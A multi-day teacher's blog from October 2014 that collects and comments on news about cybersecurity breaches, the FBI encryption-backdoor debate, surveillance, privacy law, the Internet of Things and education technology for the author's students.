Saturday, October 18, 2014
For my Computer Security students. Most companies warn their employees about unsolicited links and emails. This is just one version of the bad things that could happen.
Researchers have found a way to trick Android users into executing potentially malicious applications by hiding them inside innocent-looking image files.
Axelle Apvrille, mobile/IoT malware analyst and researcher at Fortinet, and Ange Albertini, reverse engineer and author of Corkami.com, have created an application that can be used to encrypt an APK to make it look like a PNG image file.
In a real attack leveraging this method, the attacker sends an application containing an image to the potential victim. When the app is launched, the victim only sees the harmless-looking image. In the background however, a malicious payload is installed onto the victim's Android device.
The encryption is done with AngeCryption, an application developed by the researchers
The FBI would settle for a wide open front door. (Bad advice makes you seem silly.)
Thursday, FBI Director James Comey delivered a talk at the Brookings Institution, titled “Going Dark: Are Technology, Privacy, and Public Safety on a Collision Course?” His thesis did not stray too far from his (and others’) recent calls for limitations on software from companies like Google and Apple that employs strong cryptography that even the companies themselves cannot break, even if law enforcement agencies produce a warrant for the encrypted data. These calls by law enforcement for companies to provide “back doors” to encryption and other security systems, through which companies could “unlock” the data by using, as one editorial board unfortunately put it, a “secure golden key they would retain and use only when a court has approved a search warrant.”
The problem with the “golden key” approach is that it just doesn’t work. While a golden key that unlocks data only for legally authorized surveillance might sound like an ideal solution (assuming you trust the government not to abuse it), we don’t actually know how to provide this functionality in practice. Security engineers, cryptographers, and computer scientists are in almost universal agreement that any technology that provides a government back door also carries a significant risk of weakening security in unexpected ways. In other words, a back door for the government can easily – and quietly – become a back door for criminals and foreign intelligence services.
(Related) A more “to the point” headline! (Links to other contradictory articles.)
“...and now for something completely different.” Monte Python
Safeguarding the Personal Information of all People – ODNI
Office of the Director of National Intelligence (ODNI) – Safeguarding the Personal Information of all People, July 2014.
“As the President said in his speech on January 17, 2014, “the challenges posed by threats like terrorism, proliferation, and cyber-attacks are not going away any time soon, and for our intelligence community to be effective over the long haul, we must maintain the trust of the American people, and people around the world.” As a part of that effort, the President made clear that the United States is committed to protecting the personal information of all people regardless of nationality. This commitment is reflected in the directions the President gave to the Intelligence Community on that same day, when he issued Presidential Policy Directive/PPD-28, Signals Intelligence Activities. New Standards for Safeguarding Privacy: PPD-28 reinforces current practices, establishes new principles, and strengthens oversight, to ensure that in conducting signals intelligence activities, the United States takes into account not only the security needs of our nation and our allies, but also the privacy of people around the world. The Intelligence Community already conducts signals intelligence activities in a carefully controlled manner, pursuant to the law and subject to layers of oversight, focusing on important foreign intelligence and national security priorities. But as the President recognized, “[o]ur efforts will only be effective if ordinary citizens in other countries have confidence that the United States respects their privacy too.” To that end, the Intelligence Community has been working hard to implement PPD-28 within the framework of existing processes, resources, and capabilities, while ensuring that mission needs continue to be met. In particular, PPD-28 directs intelligence agencies to review and update their policies and processes – and establish new ones as appropriate – to safeguard personal information collected through signals intelligence, regardless of nationality and consistent with our technical capabilities and operational needs.”
In order to be “fair,” shouldn't your opponents also receive an indication that you are fatigued?
Pablo S. Torre and Tom Haberstroh report:
… The boom officially began during work hours. Before last season, all 30 arenas installed sets of six military-grade [??? Bob] cameras, built by a firm called SportVU, to record the x- and y-coordinates of every person on the court at a rate of 25 times a second — a technology originally developed for missile defense in Israel. This past spring, SportVU partnered with Catapult, an Australian company that produces wearable GPS trackers that can gauge fatigue levels during physical activity. Catapult counts a baker’s dozen of NBA clients, including the exhaustion-conscious Spurs, and claims Mavericks owner Mark Cuban as both a customer and investor. To front offices, the upside of such devices is rather obvious: Players, like Formula One cars, are luxury machines that perform best if vigilantly monitored, regulated and rested.
Read more on ESPN.
In case you didn't know, when you book a flight the government must okay issuance of a boarding pass.
From Papers, Please!:
We talked at length with Watchdog investigative reporter Dave Lieber for his column in today’s Dallas Morning News: Travelers, say bon voyage to privacy.
Lieber hits the nail on the head by calling out how few travelers realize that the U.S. government is keeping a permanent file of complete mirror copies of their reservations
Read more on Papers, Please!
Your car is just another thing on the Internet of Things.
Dr. Stefan Schuppert writes:
The Conference of the German Federal and State Data Protection Authorities during its last meeting on 8 and 9 October adopted the resolution “Data Protection in the Car”. The resolution expresses a concern about what it describes as privacy risks involved in the growing collection and processing of personal data in cars, and the interests of various actors (car manufacturers, service providers, insurance companies, employers) in using those data.
The resolution outlines several obligations of car manufacturers, dealers, repair shops, and providers of communication services.
Read more on Hogan Lovells Chronicle of Data Protection.
More words or mere words?
Katherine Gasztonyi writes:
At the International Conference of Data Protection and Privacy Commissioners in Mauritius this week, representatives of the private sector and academia joined together to discuss the positive changes and attendant risks that the internet of things and big data may bring to daily life. Attendees memorialized the observations and conclusions of their discussions in a Declaration on the Internet of Things and a Resolution on Big Data. The documents are not, of course, binding. But, the fact that the Declaration and Resolution drew the consensus of a large gathering of international data protection regulators renders them relevant indicators of direction of data privacy policies and trends.
Read more on Covington & Burling Inside Privacy.
Now this is interesting. We can drag the Copyright lawyers (no doubt kicking and screaming) into the technical discussions about Big Data and the Internet of Things. What if I seeded Denver with devices that transmitted, “I am Bob's thing number 762. I am located at 39° 44' 21" N / 104° 59' 3" W Copyright © 2014 by Bob. You owe me $0.02 for this information.”
Big data and the “internet of things” — in which everyday objects can send and receive data — promise revolutionary change to management and society. But their success rests on an assumption: that all the data being generated by internet companies and devices scattered across the planet belongs to the organizations collecting it. What if it doesn’t?
Alex “Sandy” Pentland, the Toshiba Professor of Media Arts and Sciences at MIT, suggests that companies don’t own the data, and that without rules defining who does, consumers will revolt, regulators will swoop down, and the internet of things will fail to reach its potential. To avoid this, Pentland has proposed a set of principles and practices to define the ownership of data and control its flow. He calls it the New Deal on Data. It’s no less ambitious than it sounds. In the November issues of HBR, Pentland discusses how the New Deal is being received and how it’s already working in a little town in the Italian Alps.
Just because Google can't point to an article does not mean the article goes away.
BBC to publish 'right to be forgotten' removals list
The BBC is to publish a continually updated list of its articles removed from Google under the controversial "right to be forgotten" rule.
The ruling allows people to ask Google to remove some types of information about them from its search index.
But editorial policy head David Jordan told a public meeting, hosted by Google, that the BBC felt some of its articles had been wrongly hidden.
… Google decided to notify affected websites each time a link had been removed.
The BBC will begin - in the "next few weeks" - publishing the list of removed URLs it has been notified about by Google.
Eventually, your phone will do everything for you and keep on doing it for months (years?) after your death.
Google: We'll make you smarter ... if you share your data
Google's chairman says the search giant can create your ideal artificial personal assistant. The catch? You need to give up more and more of your personal information.
Tools for personal security.
MasterCard's New Credit Card Will Come With a Fingerprint Scanner
… MasterCard is now teaming up with biometric tech company Zwipe to prevent people from paying for items this way with stolen credit cards. It's a way to prove that it's actually you using the card.
The Zwipe MasterCard, which might be offered only in the UK for now, comes with a built-in fingerprint scanner that stores your thumbprint. When you put your thumb on the scanner, the embedded chip unlocks and you'll be able to tap the card to make purchases.
My world is changing – Harvard tells me so.
… Broadly speaking, competency-based education identifies explicit learning outcomes when it comes to knowledge and the application of that knowledge. They include measurable learning objectives that empower students: this person can apply financial principles to solve business problems; this person can write memos by evaluating seemingly unrelated pieces of information; or this person can create and explain big data results using data mining skills and advanced modeling techniques.
… The key distinction is the modularization of learning. Nowhere else but in an online competency-based curriculum will you find this novel and flexible architecture. By breaking free of the constraints of the “course” as the educational unit, online competency-based providers can easily and cost-effectively stack together modules for various and emergent disciplines.
A New Initiative: The GA Credentialing Network
… In partnership with a consortium of more than twenty companies, including GE, PayPal, and Elance-oDesk, we are developing a series of competency-based credentials for high-skilled positions in technology, design, and business. Our first credential, for web development skills, will be publicly available in early 2015. This initial program —and those that follow—will be available to job-seekers beyond the limits of the General Assembly student community, and will be free of charge for both job-seekers and employers.
For my lucky spreadsheet students.
35 Years Ago Today, Spreadsheets Were Invented
On this day in 1979, a computer program called VisiCalc first shipped for the Apple II platform, marking the birth of the spreadsheet, a now-ubiquitous tool used to compile everything from grocery lists to Fortune 500 company accounts.
And that’s why October 17th is Spreadsheet Day, celebrated by fans of the form.
I've been looking for a simple tutorial for my Math students.
How to Calculate Using Japanese Abacus Part 1
Hard to believe they are serious...
… LAUSD will not release an inspector general’s report into the district’s decision-making process that went into its massive purchase of iPads and Pearson curriculum. The school board voted 4–3 against releasing the information to the public.
… LAUSD Superintendent John Deasy resigned this week, on the heels of investigations into the district’s iPad procurement process and failures of its new student information system. Ray Cortines has been named interim superintendent.
… A group of Harvard Law School professors say that the university’s new sexual assault policies “lack the most basic elements of fairness and due process, are overwhelmingly stacked against the accused, and are in no way required by Title IX law or regulation.”
… “The Public Sociology Association, made up of graduate students at George Mason University, has published what adjunct advocates are calling the most comprehensive study of one institution’s adjunct faculty working conditions ever.” More on the report via Inside Higher Ed. http://www.hackeducation.com/2014/10/17/hack-education-weekly-news-10-17-2014/
Friday, October 17, 2014
I'm sure the FBI would find their job easier if they had a backdoor into all encryption systems, but they must realize that is impossible. (I can write an encryption program in minutes) Nor do they seem to need them in any significant percentage of cases. (9/3576 = 0.0025 or slightly more than ¼ of one percent)
From the wiretap report available from USCourts.gov:
… The number of federal and state wiretaps reported in 2013 increased 5 percent from 2012. A total of 3,576 wiretaps were reported as authorized in 2013, with 1,476 authorized by federal judges and 2,100 authorized by state judges.
… The number of state wiretaps in which encryption was encountered increased from 15 in 2012 to 41 in 2013. In nine of these wiretaps, officials were unable to decipher the plain text of the messages. Encryption was also reported for 52 state wiretaps that were conducted during previous years, but reported to the AO for the first time in 2013. Officials were able to decipher the plain text of the communications in all 52 intercepts.
F.B.I. Director Hints at Action as Cellphone Data Is Locked
The director of the F.B.I., James B. Comey, said on Thursday that the “post-Snowden pendulum” that has driven Apple and Google to offer fully encrypted cellphones had “gone too far.” He hinted that as a result, the administration might seek regulations and laws forcing companies to create a way for the government to unlock the photos, emails and contacts stored on the phones.
But Mr. Comey appeared to have few answers for critics who have argued that any portal created for the F.B.I. and the police could be exploited by the National Security Agency, or even Russian and Chinese intelligence agencies or criminals. And his position seemed to put him at odds with a White House advisory committee that recommended against any effort to weaken commercial encryption.
… Any technology that allows the United States government to bypass encryption in the name of solving crimes could also allow hackers and foreign governments to bypass encryption in the name of stealing secrets.
In Defense of iPhones the FBI Can't Search
(Related) I can't resist asking, is there is a business opportunity here? Surveillance-R-Us?
Police Departments Skirting Public Accountability By Using Private Foundations To Obtain Controversial Surveillance Technology
Tim Cushing writes:
The less the public knows about law enforcement surveillance technology, the better. That’s the thought process governing the purchase and deployment of technology like Stingray devices and automatic license plate readers. In the case of the former, even the nation’s top cops (the FBI) actively discourage talking about the cell tower spoofers through the use of restrictive non-disclosure agreements.
If the normal routes — as deferential as they are — seem to be a bit too “leaky,” many law enforcement agencies have a third option available to keep the public in the dark about their technology acquisitions: private funding.
Read more on TechDirt.
A poor choice of which fight to fight?
Cyber-Sleuth or Cyber-Thief? LabMD Case Continues to Expose the Good, the Bad, and the Downright Ugly in Cyber-Security Developments
Over on HIPAA, HITECH, and HIT, Elizabeth Litten comments on FTC’s administrative case against LabMD, a case I’ve been following here for the past few years. After recapping the case, she writes:
This case isn’t over, and it remains to be seen whether [Administrative Law Judge] Chappell will find the witness’s testimony credible and/or relevant to a finding that LabMD violated Section 5. It also remains to be seen whether the FTC and Tiversa will end up looking like cyber-sleuths out to uncover, and protect the public from, lax security practices, or will look more like cyber-thieves grasping for money, power, publicity or something else. Either way, this case is ugly and certainly does not create a high level of confidence in the cyber-security investigation and enforcement tactics utilized by the FTC.
Read her full column on HIPAA, HITECH, and HIT.
Have I not been saying all along that even if FTC could go after LabMD, I did not think this was a good use of their resources? And have I not been saying all along that this case strikes me as somewhat unfair to LabMD whose security – other than an employee not following policy (which still happens ALL the time) – was on a par with other HIPAA-covered entities’ data security back in 2008? If HIPAA decided not to go after LabMD for violations of its Security Rule, should FTC being take a sledgehammer to LabMD?
There are those who will claim that the only reason the FTC went after LabMD was because LabMD didn’t play the game and cooperate by jumping at every request and turning over thousands of pages of documents. But when all is said and done, does this action by the FTC do a damned thing to protect consumers? I think not, and can think of a lot of serious cases in the healthcare sector that the FTC should pursue – like a breach where patients weren’t even notified that their SSN and details were available for free download on Pirate Bay.
The FTC has done tremendous yeoman service in protecting consumers’ privacy, but sadly, not in this case.
It's better to ask forgiveness than to ask permission?
Dan Novack writes:
What’s public for me is private for thee. At least that’s what Monroe County, N.Y. believes when it comes to where you drive your car.
Monroe Police have been using high-speed cameras to capture license plates in order to log vehicle whereabouts. As of July, the County’s database contained 3.7 million records, with the capability to add thousands more each day. The justification for cops having records of the whereabouts of law-abiding citizens is that the vehicles are driven in public and therefore drivers have no expectation of privacy. It’s an argument that’s at odds with the Supreme Court’s 2012 ruling in U.S. v. Jones. In Jones, a GPS tracking case, the court held that individuals do have an expectation of privacy when it comes to their long-term whereabouts, even when using public roads.
Read more on The Intercept.
So, real-time requires a real warrant?
John Wesley Hall writes:
Real-time cell site location information is protected under Fourth Amendment. Tracey v. State, SC11-2254 (October 16, 2014). This is a fascinating opinion, and it’s the most sensitive review of the issue yet
Read an excerpt from the opinion on FourthAmendment.com
An infographic for those of us who remember all these things...
Famous Internet Firsts And Where We Are Now
A tool my students could use to create their own infographics.
Canva Launches an iPad App for Creating Beautiful Infographics and Slides
Canva is a great service for creating infographics, slides, and photo collages. The service launched last fall and has steadily grown since then. The latest update to Canva was the launch of their free iPad app.
The Canva iPad app allows you to create infographics, slides, and photo collages in much the same way as the web version of the service. To create a graphic on Canva start by selecting a template then dragging and dropping into place background designs, pictures, clip art, and text boxes. Canva offers a huge library of clip art and photographs to use in your designs (some of the clip art is free, some is not). You can also import your own images to use in your graphics. Your completed Canva projects can be saved as PDF and PNG files. You can also simply link to your online graphic.
Interesting. The world, she is a-changing.
Essay · The future of the book
Thursday, October 16, 2014
For my Computer Security students. (Report available from HP)
Cost of Cyber Attacks Jumps for US Firms: Study
A survey of 59 US firms by the Ponemon Institute with Hewlett-Packard found the average annual cost of responding to cyber attacks was $12.7 million, up 96 percent over the previous five years.
The organizations saw a 176 percent increase in the number of cyber attacks, with an average of 138 successful attacks per week, compared to 50 attacks per week when the study was initially conducted in 2010.
The average time to detect an attack was 170 days, and it took on average 45 days to resolve a cyber incident, costing an average of $1.6 million, according to the researchers.
Teens: “We have the technology, let's use it!” Old Geezer (Bob): “I have the technology. I can't think of a reason to use it.”
Google study shows that we use Voice Search for a lot of embarrassing things
… A study commissioned by Google on how people use voice search was released today, and from it we've learned more than we ever wanted to know about how people use voice search.
… Apparently, 22 percent of teens have for some reason admitted to using voice search while in the bathroom. When you're in the age group that uses voice search most often, you're not going to let a quick pit stop to the restroom stop you from talking to your smartphone. The study found that 55 percent of teens ages 13 to 18 use hands-free search every day, compared to 41 percent of adults.
… In response to the question, "pick one thing you wish you could ask your phone to do for you," 45 percent of teens chose "send me a pizza." Boring adults chose the boring answer "tell me where my keys are" to the tune of 44 percent, but 36 percent of adults showed that they still have some fun in them by also saying they would like voice search to send them pizzas.
Could be useful. I'll add this to my Disaster Recovery class. Facebook will probably map “disasters” worldwide and become the “website of doom.”
Facebook's 'Safety Check' lets friends know you're safe
During a major disaster, Facebook users can let their friends and family know they are safe by using the new Safety Check tool.
When the tool is activated and Facebook determines that a user may be in an area where a natural disaster occurred, the social network will send a notification asking if the user is safe. If the response “I’m Safe” is selected, Facebook will create a post and share it on the user’s news feed, telling friends they are out of peril. Friends too have the possibility to mark someone as safe.
Facebook determines a user’s location by looking at the city listed in their profile, their last location if they’ve opted in to the Nearby Friends service, and the city where they are using the Internet, presumably derived from their IP address. If the location is wrong the user can tell Safety Check they are not in the affected area.
(Related) Sometimes it's good that your “Things” know where you are and can tell anyone(?) who asks! (Is something seriously wrong with OnStar?)
'Find My iPhone' App Helps Locate Missing Motorist
A California woman who drove her car into a 500-foot ravine was rescued this week after her family and one clever police officer were able to determine her location via her iPhone, the San Jose Mercury News reported.
The unnamed, 28-year-old resident of Campbell, Calif. veered off Mount Hamilton Road in a 2012 Chevy Cruze on Monday and wound up spending 18 hours at the bottom of the ravine before being airlifted out by a Coast Guard helicopter on Tuesday morning, the newspaper reported.
Though her vehicle was outfitted with General Motors's OnStar system, which determines a vehicle's location by means of a roof-mounted GPS antenna, the company was not able to pinpoint where the car was, according to the Mercury News.
… An OnStar spokesperson also told the Mercury News that GM's system "only keeps track of users locations at discreet moments in time, such as when an accident happens or when they call in to get driving directions from a particular place."
By contrast, when location tracking and location-based apps are enabled on an iPhone, the device and Apple's tracking system attempt to maintain an ongoing connection to pinpoint the location of the smartphone.
Revolt of the Content Providers?
HBO Launching Standalone Service In 2015
HBO has announced plans to offer a standalone subscription service starting sometime in 2015. HBO is currently only available to U.S. residents who also pay for a raft of other channels. But HBO CEO Richard Plepler has promised to go “beyond the wall” and launch a “stand-alone, over the top” version next year.
Details are thin on the ground, so it isn’t yet known how HBO will deliver such a service to customers, or what it’ll charge for the privilege. Regardless, this puts HBO on a collision course with streaming services, and Netflix in particular. But with an increasing number of people refusing to pay a small fortune for channels they don’t want to watch, HBO had to act, and fast.
Expanding the earlier survey.
A World of Beloved Books (According to Facebook)
What books have stayed with you?
… Back in September, Facebook tallied up the results of that status game worldwide. Its findings? The Harry Potter series, To Kill a Mockingbird, The Lord of the Rings, and Pride and Prejudice led the way. They were followed by none other than the Bible.
Since then, the game has gotten bigger, spreading to other countries and languages. In a new blog post, Facebook has unveiled which books are beloved in nations that have had 20,000 or more responses—that is, France, India, Italy, Mexico, Brazil, and the Philippines.
What did they find? In those six nations—as in the U.S. and U.K.-dominated first tally—the Boy Who Lives dominates.
… Facebook has the full list for each country on its site.
For my spreadsheet students.
How To Use An Excel Pivot Table For Data Analysis
For my Computer Security students, past & present.
Looking for a job? Cyber Aces is hosting another National Cybersecurity Career Fair in November
Last spring I wrote about Cyber Aces hosting its first National Cybersecurity Career Fair (NCCF). (See National Cybersecurity Career Fair in June Will Connect Employers to Entry Level Cybersecurity Workers.)
… The group held its first ever career fair this past June and the event was so successful that it has decided to make the career fair a semi-annual event. The next NCCF is scheduled for November 20 and 21, 2014. Now is the time to register and create your personal profile if you want to meet with prospective employers.
For my Android toting students. Probably a similar one for the iPhone.
– is an Android app that welcomes you into the world of data by showing you the output of all sensors of your Android device. Check the temperature, humidity, air pressure, gravity, light, acceleration and a lot more. Most sensors also display a chart with the output of the sensor so you can better watch the changes during the time.
Wednesday, October 15, 2014
For my Ethical Hackers. I repeat, technically sophisticated hacks are fun, but the real money is in the huge volume of simple, low skill hacks that are available. (Note that management should be a bit concerned with their Security manager if they hear things like this.)
Byron Acohido reports;
Ethical hacker Bryan Seely of Seattle-based Seely Security showed how MBIA has long been exposing details of municipal bond and investment management accounts in a way that made it easy for criminals to transfer funds from existing accounts into newly created ones they control. There’s no evidence any theft took place, only because the bad guys appear to have overlooked this freebie.
Seely says he has identified more than 8,000 other servers that are similarly misconfigured and likewise exposing sensitive accounts on the open Internet. These are accounts that should be kept under lock and key.
Seely has been on a one-man campaign to notify organizations, and a few have listened to him.
Read more on Credit.com
[From the article:
“In the case of MBIA, it was not at risk because of a flaw in Oracle,” Seely says. “This was simply because the customer did not configure the server correctly when they deployed it, and it caused private banking records to be exposed to the Internet.”
(Related) Not hearing about security weaknesses is even worse. (Not to mention, pretending to not hear)
Did MCCCD leadership shut their eyes to a database security assessment for plausible deniability in litigation?
A former Maricopa County Community College District employee alleges executive leadership closed their eyes to a report on their database security conducted after their massive data breach in 2013 so they would have plausible deniability in any litigation. As a result, the employee alleges, the findings were never shared with those tasked with securing MCCCD’s data assets.
In November 2013, Maricopa County Community College District (MCCCD) disclosed that they had been informed by the FBI that 14 databases with personal information had been found up for sale on the Internet. The potential compromise of 2.5 million students’, employees’ and vendors’ personal and financial information currently stands as the largest breach ever in the education sector.
As part of its continuing investigation into that breach, DataBreaches.net recently disclosed parts of a report issued by Stach & Liu in 2011 after an earlier hacking incident. Failure to properly remediate that breach had been cited as a factor in the 2013 breach. Of special relevance now, MCCCD’s external counsel had asserted that MCCCD administration at the highest levels never even knew of the report’s existence until after the 2013 breach. [Apparently they don't read the local newspaper or watch local TV news. Bob] Their claim was disputed by former employee Earl Monsour, who stated he had delivered the report to the Vice Chancellor for ITS.
[I suggest you read the full article! Bob]
Is this because they have crazy people just across the boarder?
Cho Mu-hyun reports:
The shocking figure of over 106 million privacy breaches was unveiled by a report of data leaks between 2010 to 2014 filed by the Korea Communication Commission (KCC) to the National Assembly during the yearly government audit of ministries.
The figure means that each person has, on average, had his or her personal information leaked 2.1 times during the past four years in a country with a population of 50 million.
Read more on ZDNet.
For my Computer Security students. Should I add this to my “Stalker's Toolbox?”
How Anyone Can Find Your Personal Details Via Twitter With Tinfoleak
… There’s a free script called Tinfoleak which can pull an alarming amount of information about any Twitter user based simply on their profile and their tweets. Let me show you how it works.
Take that, Steve Jobs! (Could I follow this business model here in the US?)
… Xiaomi, the four-year-old Chinese smartphone manufacturer, has found just such a sweet spot, and as a result is taking the smartphone industry by a storm. Pundits claim that Xiaomi is just a Chinese copycat of Apple, and not without some reason. Some point to Xiaomi’s product introductions, which are eerily just like Apple’s. Others point out the strong similarities between Xiaomi’s operating system (named MIUI) and Apple’s iOS. What’s more, Xiaomi’s products rank among the best in the industry in terms of performance. All these cues might lead us to believe that it is competing head to head with the leading smartphone manufacturers.
However, looking at the full extent of Xiaomi’s business model reveals just how different – and how disruptive — it is. For starters, unlike Apple, Xiaomi is not targeting premium customers; it’s mostly teens buying those high-quality phones, and hardly at a premium, since Xiaomi’s prices are at least 60% lower. A neat trick. How does Xiaomi pull that off?
For my Ethical Hackers. Think of the fun possible by driving through a neighborhood, unlocking doors as you go!
August Smart Lock Gets Key Exposure in Apple Stores
The August Smart Lock will become available for purchase at Apple retail stores in the United States starting this week, the company announced on Tuesday.
Priced at US$249.99, the smart device uses Bluetooth and a mobile app to create a virtual key.
The August Smart Lock replaces the interior portion of users' existing deadbolt locks but does not require users to change their exterior door hardware; their physical, metal keys will work with the deadbolt as well.
The device is powered by four AA batteries [Why you need to keep the key Bob] and can be installed in about 10 minutes, August said.
Once in place, the smart lock allows users to control access to their home via smartphone. They can provide temporary or ongoing access to select others at will, including creating invited guest lists from their contacts for a party or event, for example.
Log records show who has entered and exited.
It's sad to think we need to buy hardware, install special software, or go to any extra effort at all to secure our communications. The amount of “over-subscription” ($7,500 asked, $500,000+ pledged) suggests we do want security and recognize the need to pay for it.
Cassandra Khaw reports:
On the internet, everyone is susceptible to invasions of privacy. But, a group of developers is hoping to change this by kickstarting a one-stop solution for anyone looking to peruse the internet without having their personal information harvested.
Anonabox hinges on open source software known as Tor, which encrypts user activities on the World Wide Web. While some amount of technical knowledge is usually needed to implement Tor, Anonabox will purportedly offer plug-and-play usability.
Read more on The Verge.
Clearly I'm pleased to see that Harvard clearly wants to clearly clarify the clutter surrounding the Internet of Things. Definitely worth a read!
The Internet of Things is definitely becoming a Thing, in the same way that big data’s a Thing or the sharing economy’s a Thing. And the thing about a thing that becomes a Thing is, it’s easy to lose sight of the things that made it a thing before everyone declared it the Next Big Thing that will change everything.
Got it? Good. We’ll start there. With the hype over the Internet of Things behind us. Because whether or not it’s a Thing, the internet of things is already a lot of things.
… But before you read anything else, I suggest you check out Michael Porter’s new opus of an article on the Internet of Things and strategy.
It’s quite a thing.
(Related) Also mentioned in the previous article.
Search engine for the Internet of Things
“Thingful® is a search engine for the Internet of Things, providing a unique geographical index of connected objects around the world, including energy, radiation, weather, and air quality devices as well as seismographs, iBeacons, ships, aircraft and even animal trackers. Thingful’s powerful search capabilities enable people to find devices, datasets and realtime data sources by geolocation across many popular Internet of Things networks, and presents them using a proprietary patent-pending geospatial device data search ranking methodology, ThingRank®. If you are concerned about asthma, find out about any air quality monitors in your neighbourhood; somebody working with a Raspberry Pi can find others round the corner using the same computing platform; if you notice a ship moored nearby, discover more about it by tracking it on Thingful, or get notified of its movements; a citizen concerned about flooding in a new neighbourhood can look up nearby flood monitors or find others that have been measuring radiation. You might even watch the weekly movements of a shark as it explores the oceans. The possibilities are unbounded! Thingful also enables people and companies to claim and verify ownership of their things using a provenance mechanism, thereby giving them a single web page that aggregates information from all their connected devices no matter what network they’re on, in categories that include health, environment, home, transport, energy and flora & fauna. Users can also add objects to a Watchlist in order to keep track of them, monitor their realtime status and get notifications when they change.”
They talk statistics, I'm looking for immediate (hardware or software) feedback.
Training Students to Extract Value from Big Data
“As the availability of high-throughput data-collection technologies, such as information-sensing mobile devices, remote sensing, internet log records, and wireless sensor networks has grown, science, engineering, and business have rapidly transitioned from striving to develop information from scant data to a situation in which the challenge is now that the amount of information exceeds a human’s ability to examine, let alone absorb, it. Data sets are increasingly complex, and this potentially increases the problems associated with such concerns as missing information and other quality concerns, data heterogeneity, and differing data formats. The nation’s ability to make use of data depends heavily on the availability of a workforce that is properly trained and ready to tackle high-need areas. Training students to be capable in exploiting big data requires experience with statistical analysis, machine learning, and computational infrastructure that permits the real problems associated with massive data to be revealed and, ultimately, [I'm gunning for “immediately” Bob] addressed. Analysis of big data requires cross-disciplinary skills, including the ability to make modeling decisions while balancing trade-offs between optimization and approximation, all while being attentive to useful metrics and system robustness. To develop those skills in students, it is important to identify whom to teach, that is, the educational background, experience, and characteristics of a prospective data-science student; what to teach, that is, the technical and practical content that should be taught to the student; and how to teach, that is, the structure and organization of a data-science program. Training Students to Extract Value from Big Data summarizes a workshop convened in April 2014 by the National Research Council’s Committee on Applied and Theoretical Statistics to explore how best to train students to use big data. The workshop explored the need for training and curricula and coursework that should be included. One impetus for the workshop was the current fragmented view of what is meant by analysis of big data, data analytics, or data science. New graduate programs are introduced regularly, and they have their own notions of what is meant by those terms and, most important, of what students need to know to be proficient in data-intensive work. This report provides a variety of perspectives about those elements and about their integration into courses and curricula.”
Demographics and Big Data. Summarizing by Zip Code.
Big Data Can Guess Who You Are Based on Your Zip Code
In the era of Big Data, your zip code is a window into what you can afford to buy, but it also reveals how you spend time—and, in essence, who you are.
That's according to software company Esri, which mapped zip codes across the United States and linked them to one of 67 profiles of American market segments.
… The level of detail is striking and—from what I could tell based on cross-referencing some of my own last several zip codes of residence—pretty accurate, too. Anyone can plug a zip code into Esri's database, which makes for an addicting game of "guess my identity."
… In the United States, where there are virtually no regulations on data collection, someone trying to profile you can fairly easily learn how much money you make, your education level, whether you own a home, who you voted for, how many kids you have, how much credit card debt you're carrying, even what you thought of the series finale of How I Met Your Mother.
Dilbert nails it again. This is exactly what happens when I assign Group Projects.
Tuesday, October 14, 2014
My Computer Security students need to understand this common follow-on to security breaches.
David Allison provides a litigation update here.
The next question is how many of them will be dismissed because of lack of standing.
(Related) Another reality of security breaches – they just keep on giving you headaches. In this case it seems to have triggered other investigations...
Aaron’s agrees to refund over $25M to consumers for violating California laws, including privacy laws
Wow. I suspected Aaron’s problems over spyware in rent-to-own computers weren’t over, but they just agreed to pay $28.4 million to settle California’s charges against them that included privacy violations:
… The complaint alleges that Aaron’s violated California’s Karnette Rental-Purchase Act, which is the strongest rent-to-own law in the country, by charging improper late fees, overcharging customers who paid off contracts early, and omitting important contract disclosures.
In addition, the complaint alleges that Aaron’s violated California state privacy laws by permitting its franchised stores to install spyware on laptop computers rented to its customers. A feature in the spyware program called ‘Detective Mode’, which was installed without consumers’ consent or knowledge, allowed the Aaron’s franchisees to remotely monitor keystrokes, capture screenshots, track the physical location of consumers and even activate the rented computer’s webcam.
… Copies of the complaint and stipulated judgment are attached to the online version of this release at www.oag.ca.gov/news.
Surely Buffy, Muffin, and Chaz would not stoop to such things?
Well, this is tacky, at best. It appears some members of the Sausalito Yacht Club gained access to the membership roster. From the notification letter of October 4:
We are writing to you because of an incident at the Sausalito Yacht Club on or about October 1, 2014,wherein several members gained unauthorized access to our member roster, which includes information linking your name to your private Sausalito Yacht Club member number, the combination of which allows you to charge beverages, goods, services and meals at the club, such amounts being charged at the time and accumulated for inclusion on your next bill.
The data to which unauthorized access occurred also included your personal contact information, and in certain cases, sensitive financial account information, including accounts receivable that were overdue by sixty days or more. As best we can tell, no bank account information or credit card information was involved in this breach.
… We are also undertaking steps to strengthen access [Strange wording Bob] to sensitive financial and membership sites with new passwords required for access by authorized users.
So, will they throw the intrusive and thoughtless privacy invaders out of the Yacht Club or will money triumph?
That was rhetorical.
This seems a bit too generic for me. “Oh look, someone is hacking.”
Russian Hackers Used Bug in Microsoft Windows for Spying, Report Says
Russian hackers used a bug in Microsoft Windows to spy on several Western governments, NATO and the Ukrainian government, according to a report released Tuesday by iSight Partners, a computer security firm in Dallas.
The targets also included European energy and telecommunications companies and an undisclosed academic organization in the United States, the cybersecurity report said.
… While the vulnerability affected many versions of Windows, iSight said the Russian hackers appeared to be the only group to use the bug. The company added, however, that other companies and organizations may also have been affected by the attacks.
Sometimes you get much more than you expected.
Snapchat Hackers Could Be Prosecuted for Child Porn Offenses
Private videos and pictures shared between tens of thousands of Snapchat users -- possibly as many as 200,000 -- were posted online by hackers over the weekend in an episode dubbed the "Snappening." Much of the content is sexual, including many nude photos -- some possibly of minors.
The hackers appear to have gone for maximum embarrassment and humiliation with this particular breach: A document also published online reportedly links many of the hacked images to user names.
One of the most well known downsides of any large database. They become large targets for hackers.
After an avalanche of data breaches, South Korea’s national identity card system has been raided so thoroughly by thieves that the government says it might have to issue new ID numbers to every citizen over 17 at a possible cost of billions of dollars.
The admission is an embarrassment for a society that prides itself on its high-tech skills and has some of the fastest Internet access.
Read more on CBC.
Do you ever talk about company strategy?
Who’s Watching Your WebEx?
KrebsOnSecurity spent a good part of the past week working with Cisco to alert more than four dozen companies — many of them household names — about regular corporate WebEx conference meetings that lack passwords and are thus open to anyone who wants to listen in.
… Many of the meetings that can be found by a cursory search within an organization’s “Events Center” listing on Webex.com seem to be intended for public viewing, such as product demonstrations and presentations for prospective customers and clients. However, from there it is often easy to discover a host of other, more proprietary WebEx meetings simply by clicking through the daily and weekly meetings listed in each organization’s “Meeting Center” section on the Webex.com site.
… Cisco began reaching out to each of these companies about a week ago, and today released an all-customer alert (PDF) pointing customers to a consolidated best-practices document written for Cisco WebEx site administrators and users.
